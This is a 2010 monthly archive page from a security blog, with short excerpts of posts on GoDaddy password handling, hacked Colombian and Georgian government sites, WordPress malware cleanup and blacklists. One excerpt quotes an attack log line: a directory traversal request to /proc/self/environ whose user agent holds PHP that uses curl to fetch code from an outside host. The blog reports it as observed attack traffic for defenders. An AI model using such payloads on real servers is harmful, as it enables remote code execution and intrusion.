Monthly Archives: February 2010

GoDaddy Security update

My last post GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission got a lot of traction and it reached the ears of the GoDaddy people! I just got off the phone with … Read more


Posted in Uncategorized | Tagged , | 70 Comments

GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission

*UPDATE: I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me. Check it out: GoDaddy Security update I have been a GoDaddy user for a while and never had … Read more


Posted in Uncategorized | Tagged , , , | 66 Comments

.ORG whois reporting DNSSEC status

I was glad to see a handful of whois updates today coming from all the .ORGs that we are monitoring at Sucuri. Basically now at the end of the Whois, it is showing if that domain is using DNSSEC or … Read more


Posted in Uncategorized | Tagged , , | 3 Comments

Colombia Government sites hacked (and spreading malware)

You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, … Read more


Posted in Uncategorized | Tagged , , | 8 Comments

PHP in the user agent (attacking log analysis tools?)

Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this: a.b.229.82 – – [19/Jan/2010:22:43:39 -0700] “GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1″ 200 3820 “-” “< ? echo ‘_rce_’;echo php_uname();echo ‘_rce_’;$ch=curl_init();curl_setopt($ch, CURLOPT_URL, ‘http://websalesusa.com/ken’);curl_setopt($ ch, … Read more


Posted in Uncategorized | Tagged , | 5 Comments

Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect. You know, you would think that after all the attacks that Georgia suffered in 2008 they would … Read more


Posted in Uncategorized | Tagged , , , | 5 Comments

Removing Malware from a WordPress blog – Case Study

Early this week we were hired to remove some malware from a quite popular web site. The malicious code was there for a little while and the site got blacklisted by google. That’s how the owner noticed it. Everytime someone … Read more


Posted in hacked, malware, security, sucuri, wordpress | Tagged , , , | 15 Comments

Amazon.com blacklisted by SpamHaus XBL

Update: Spamhaus contact us to let us know that they removed amazon from the blacklist and are investigating the issue. SPAMHAUS has various blacklists and one of them is the XBL: “The Spamhaus Exploits Block List (XBL) is a realtime … Read more


Posted in Uncategorized | Tagged , , | 3 Comments